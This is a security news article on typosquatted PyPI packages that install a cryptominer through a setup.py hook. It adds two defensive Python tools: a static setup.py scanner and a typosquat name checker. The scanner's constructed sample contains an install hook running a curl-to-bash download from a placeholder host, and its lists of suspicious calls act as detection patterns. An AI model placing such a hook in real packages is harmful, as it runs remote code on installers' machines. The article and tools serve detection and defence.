Malicious Packages on PyPI Found Stealing Resources for Cryptocurrency Mining
Security firm Sonatype has uncovered a series of malicious packages on the Python Package Index (PyPI). Posted by the user 'nedog123', the packages have collectively racked up nearly 5,000 downloads since their release in April. The packages, including 'maratlib' and 'matplatlib-plus', are the latest instance of a wider problem: attackers seeding open-source repositories with look-alike packages in the hope that developers install them by mistake.
Sonatype, tracking the packages under sonatype-2021-0722, found that they are typosquats: their names mimic legitimate software so that a mistyped or misremembered name lands on the attacker's package. The malicious code is hidden in setup.py and runs automatically when pip installs the package from source, so the victim never has to import or call anything. At install time it downloads a Bash script from GitHub, and that script installs a cryptominer called 'Ubqminer', which then consumes the machine's CPU to mine cryptocurrency for the attacker.
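The pattern described above, a setup.py that fetches and executes something at install time, can be triaged statically before anything is installed. The following is an added example, not Sonatype's tooling and not the maratlib code: it parses a setup.py with the standard-library ast module and reports imports, calls and setuptools command overrides that have no business in a build script. The two setup.py samples are constructed for the example; the URL and script name in the malicious sample are placeholders, not the real downloader.

```python
"""Static triage of a setup.py for install-time code execution (added example)."""
import ast

# Modules whose presence in a setup.py rarely has a legitimate build purpose.
SUSPICIOUS_MODULES = {"subprocess", "urllib", "urllib.request", "requests",
                      "socket", "base64"}
# Calls that spawn processes, fetch remote content or run dynamic code.
SUSPICIOUS_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
                    "subprocess.Popen", "subprocess.check_output",
                    "urllib.request.urlopen", "urllib.request.urlretrieve",
                    "requests.get", "exec", "eval"}
# setuptools command classes whose run() executes during `pip install` from sdist.
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return a sorted list of (lineno, reason) findings for setup.py source text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_MODULES:
                    findings.add((node.lineno, f"import {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if node.module in SUSPICIOUS_MODULES:
                findings.add((node.lineno, f"from {node.module} import ..."))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.add((node.lineno, f"call {name}()"))
            # setup(..., cmdclass={...}) is how install-time hooks get registered.
            if name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                findings.add((node.lineno, "setup() registers cmdclass hooks"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = _dotted_name(base)
                if base_name and base_name.split(".")[-1] in INSTALL_HOOK_BASES:
                    findings.add((node.lineno,
                                  f"class {node.name} overrides setuptools command {base_name}"))
    return sorted(findings)


# Constructed sample mimicking the described technique; placeholder URL and name.
MALICIOUS_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import os

class PostInstall(install):
    def run(self):
        install.run(self)
        # fetch-and-run stand-in for the downloader; not the real script or URL
        os.system("curl -fsSL https://example.invalid/payload.sh | bash")

setup(name="example-typosquat", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign sample: declares metadata and nothing else.
BENIGN_SETUP_PY = '''\
from setuptools import setup, find_packages

setup(name="example-lib", version="1.0", packages=find_packages())
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(label, scan_setup_py(src))
```

Two caveats a reviewer should keep in mind. A static scan is evadable (string obfuscation, base64 blobs, or code that only runs when the package is imported rather than installed), so an empty result is triage, not a clean bill of health. And the hook only fires for source distributions: installing with `pip install --only-binary :all:` from wheels never executes setup.py, which removes this particular install-time vector even if it does not remove a malicious package's runtime code.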
The core component is 'maratlib': the other malicious packages simply declare it as a dependency, so installing any of them pulls the payload in. Sonatype's automated malware detection system, Release Integrity, discovered the counterfeit components. Since 2019, Release Integrity has identified over 12,000 suspicious open source packages on npm alone, which gives a sense of how routine malicious typosquatting has become.
The report does not say which cryptocurrency the miner targets. Sonatype advises users to be careful when installing packages, especially ones whose names are close to those of well-known libraries, and to verify a name against the project's own documentation rather than typing it from memory. Affected users are urged to uninstall the malicious packages and then check their systems for lingering miner activity: uninstalling only removes the package's files, it does not undo what setup.py already executed, so the miner and any persistence it set up must be found and removed separately.
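The advice above can be enforced before pip ever runs. What follows is an added example, not part of the article or of Sonatype's tooling: a pre-install check for a requirements file that normalizes package names the way PyPI does (PEP 503), rejects names on a denylist seeded with the two names the article gives, and flags names within one edit of a well-known package. The list of popular packages is a short constructed stand-in, not a live feed, and the sample requirements file is constructed for the example.

```python
"""Pre-install name check for pip requirements (added example)."""
import re

# Names reported in the article; a real deployment would pull from an advisory feed.
DENYLIST = {"maratlib", "matplatlib-plus"}
# Constructed stand-in for a list of popular package names (assumption, not a feed).
POPULAR = {"matplotlib", "numpy", "requests", "scipy", "pandas", "urllib3", "setuptools"}
MAX_DISTANCE = 1


def normalize(name):
    """PEP 503 normalization: lowercase, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a, b):
    """Levenshtein distance with the standard two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def near_miss(normalized):
    """Return (token, popular_name, distance) for the closest near-miss, else None.

    Both the whole name and each hyphen-separated token are compared, so that
    'matplatlib-plus' is caught through its 'matplatlib' token.
    """
    best = None
    for cand in [normalized] + normalized.split("-"):
        for pop in sorted(POPULAR):
            if cand == pop:
                continue
            d = edit_distance(cand, pop)
            if d <= MAX_DISTANCE and (best is None or d < best[2]):
                best = (cand, pop, d)
    return best


def check_name(name):
    """Return (verdict, detail) with verdict one of 'deny', 'suspect', 'ok'."""
    n = normalize(name)
    if n in DENYLIST:
        return "deny", "listed in advisory denylist"
    if n in POPULAR:
        return "ok", "exact match of a known package"
    hit = near_miss(n)
    if hit:
        return "suspect", f"'{hit[0]}' is within {hit[2]} edit(s) of '{hit[1]}'"
    return "ok", "no close match"


def check_requirements(text):
    """Check each requirement line; return {name: (verdict, detail)} for non-ok names."""
    results = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):      # skip blanks and pip options
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)  # name ends at version/extras
        if not m:
            continue
        verdict, detail = check_name(m.group(0))
        if verdict != "ok":
            results[m.group(0)] = (verdict, detail)
    return results


# Constructed requirements file mixing legitimate and suspicious names.
SAMPLE_REQUIREMENTS = """\
numpy>=1.21
matplatlib-plus==0.1   # constructed example line
requests-oauthlib
maratlib
numpyy
"""

if __name__ == "__main__":
    for name, (verdict, detail) in check_requirements(SAMPLE_REQUIREMENTS).items():
        print(f"{verdict:8} {name}: {detail}")
```

Note the limitation the sample exposes: 'maratlib' is four edits away from 'matplotlib', so the distance check alone never flags it and only the denylist does. Loose look-alikes are exactly why a curated denylist from advisories has to sit beside any similarity heuristic, and why the heuristic's threshold should stay low to avoid flagging legitimate plugins such as 'requests-oauthlib'.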